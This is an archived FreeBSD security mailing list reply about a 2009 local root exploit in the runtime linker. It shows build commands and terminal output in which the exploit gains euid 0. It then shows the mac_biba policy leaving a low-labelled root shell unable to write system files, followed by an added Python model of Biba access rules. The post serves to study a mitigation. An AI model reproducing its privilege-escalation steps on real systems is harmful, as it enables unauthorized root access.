From owner-freebsd-security@FreeBSD.ORG Tue Dec 1 18:01:15 2009
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 4AD0D106568B; Tue, 1 Dec 2009 18:01:13 +0000 (UTC) (envelope-from borjam@sarenet.es)
Received: from proxypop1.sarenet.es (proxypop1.sarenet.es [194.30.0.99]) by mx1.freebsd.org (Postfix) with ESMTP id 07EB28FC14; Tue, 1 Dec 2009 18:01:12 +0000 (UTC)
Received: from [172.16.1.204] (izaro.sarenet.es [192.148.167.11]) by proxypop1.sarenet.es (Postfix) with ESMTP id 080CC5CA2; Tue, 1 Dec 2009 18:41:19 +0100 (CET)
From: Borja Marcos
Date: Tue, 1 Dec 2009 18:41:07 +0100
To: freebsd-security@freebsd.org
Cc: FreeBSD Security Advisories
Subject: Re: Upcoming FreeBSD Security Advisory
In-Reply-To: <200912010120.nB11Kjm9087476@freefall.freebsd.org>
References: <200912010120.nB11Kjm9087476@freefall.freebsd.org>
List-Id: "Security issues [members-only posting]"

On Dec 1, 2009, at 2:20 AM, FreeBSD Security Officer wrote:

> A short time ago a "local root" exploit was posted to the full-disclosure
> mailing list; as the name suggests, this allows a local user to execute
> arbitrary code as root.

Dr. Strangelove, or How I learned to love the MAC subsystem.
# uname -a
FreeBSD test 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri Nov 20 13:20:06 CET 2009     root@test:/usr/obj/usr/src/sys/TEST  amd64

$ gcc -o program.o -c program.c -fPIC
$ gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
$ ./env
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# id
uid=1001(user) gid=1001(user) euid=0(root) groups=1001(portero),0(wheel)
# /usr/sbin/getpmac
biba/high(low-high)

And of course it's root. Now,

$ setpmac biba/low\(low-low\) csh
% pwd
/tmp
% ./env
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
#

** OMG!! IT WORKED!! BUT

# touch /etc/testing_the_exploit
touch: /etc/testing_the_exploit: Permission denied
# ls -l /usr/sbin/getpmac
-r-xr-xr-x  1 root  wheel  7144 May  1  2009 /usr/sbin/getpmac
# /usr/sbin/getpmac
biba/low(low-low)

OOHHHHH, we have a toothless root. Maybe a "riit"?

Pity these serious security mechanisms don't get widespread usage.

Borja.
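The transcript above shows why the second root shell is "toothless": under mac_biba(4), access is decided by the Biba integrity label of the process, not by euid. The following is an added example, written for this page and not code from the poster or from FreeBSD; it models the two mac_biba rules the transcript exercises ("no write up": a subject may write an object only if the subject's effective label dominates the object's; "no read down": a subject may read an object only if the object's label dominates the subject's), plus the setpmac(8) relabel rule that a new label must lie inside the subject's current range. It parses the label syntax printed by getpmac (`biba/high(low-high)`, `biba/low(low-low)`, and numeric grades with compartments such as `biba/10:2+3`). The labels assumed for `/etc` and `/usr/sbin/getpmac` (`biba/high`) are assumptions about a default-labelled system, and the model deliberately omits privilege overrides and policy sysctls that a real kernel also consults.

```python
"""Toy model of mac_biba(4) access decisions (added example, not FreeBSD code)."""
import re
from dataclasses import dataclass
from typing import FrozenSet, Optional, Tuple


@dataclass(frozen=True)
class BibaGrade:
    kind: str                      # "low", "high", "equal" or "num"
    level: int = 0                 # only meaningful for kind == "num"
    compartments: FrozenSet[int] = frozenset()

    def dominates(self, other: "BibaGrade") -> bool:
        """Biba dominance: self >= other in the integrity lattice."""
        if self.kind == "equal" or other.kind == "equal":
            return True            # "equal" matches any label, both ways
        if self.kind == "high" or other.kind == "low":
            return True
        if self.kind == "low" or other.kind == "high":
            return False
        return self.level >= other.level and self.compartments >= other.compartments


@dataclass(frozen=True)
class BibaLabel:
    effective: BibaGrade
    bounds: Optional[Tuple[BibaGrade, BibaGrade]] = None   # (low, high) range, subjects only


def parse_grade(text: str) -> BibaGrade:
    """'low' | 'high' | 'equal' | '<N>' | '<N>:c1+c2+...'"""
    text = text.strip()
    if text in ("low", "high", "equal"):
        return BibaGrade(text)
    level, _, comps = text.partition(":")
    if not level.isdigit():
        raise ValueError(f"bad biba grade: {text!r}")
    compartments = frozenset(int(c) for c in comps.split("+") if c) if comps else frozenset()
    return BibaGrade("num", int(level), compartments)


_LABEL_RE = re.compile(r"^biba/([^()]+)(?:\(([^()-]+)-([^()-]+)\))?$")


def parse_label(text: str) -> BibaLabel:
    """Parse a maclabel(7) biba label as printed by getpmac(8)."""
    m = _LABEL_RE.match(text.strip())
    if not m:
        raise ValueError(f"bad biba label: {text!r}")
    effective = parse_grade(m.group(1))
    bounds = None
    if m.group(2) is not None:
        lo, hi = parse_grade(m.group(2)), parse_grade(m.group(3))
        if not hi.dominates(lo):
            raise ValueError(f"range high end does not dominate low end: {text!r}")
        bounds = (lo, hi)
    return BibaLabel(effective, bounds)


def can_write(subject: BibaLabel, obj: BibaLabel) -> bool:
    """No write up: subject must dominate object."""
    return subject.effective.dominates(obj.effective)


def can_read(subject: BibaLabel, obj: BibaLabel) -> bool:
    """No read down: object must dominate subject."""
    return obj.effective.dominates(subject.effective)


def can_relabel(subject: BibaLabel, new: BibaLabel) -> bool:
    """setpmac(8) on oneself: new effective label and new range must fit
    inside the current range (simplification: no privilege override)."""
    if subject.bounds is None:
        return False
    lo, hi = subject.bounds
    if not (new.effective.dominates(lo) and hi.dominates(new.effective)):
        return False
    if new.bounds is not None:
        nlo, nhi = new.bounds
        if not (nlo.dominates(lo) and hi.dominates(nhi)):
            return False
    return True


def replay_transcript() -> dict:
    """Re-derive the decisions behind the transcript with assumed object labels."""
    etc = parse_label("biba/high")            # assumption: system dirs labelled high
    getpmac_bin = parse_label("biba/high")    # assumption: system binaries labelled high
    root_shell = parse_label("biba/high(low-high)")   # first root shell, per getpmac
    lowered = parse_label("biba/low(low-low)")        # after setpmac, per getpmac
    return {
        "relabel_to_low": can_relabel(root_shell, lowered),      # setpmac succeeds
        "high_root_writes_etc": can_write(root_shell, etc),      # real root can touch /etc
        "low_root_writes_etc": can_write(lowered, etc),          # EPERM despite euid 0
        "low_root_reads_getpmac": can_read(lowered, getpmac_bin),  # ls/exec still allowed
        "low_root_raises_label": can_relabel(lowered, root_shell),  # cannot climb back out
    }


if __name__ == "__main__":
    for name, decision in replay_transcript().items():
        print(f"{name:28s} {'ALLOW' if decision else 'DENY'}")
```

The last entry is the one that matters for the exploit: once the shell has been confined to `biba/low(low-low)`, its range no longer contains `high`, so even with euid 0 it cannot setpmac itself back up, and every write to a high-labelled object (everything that makes root useful) is refused.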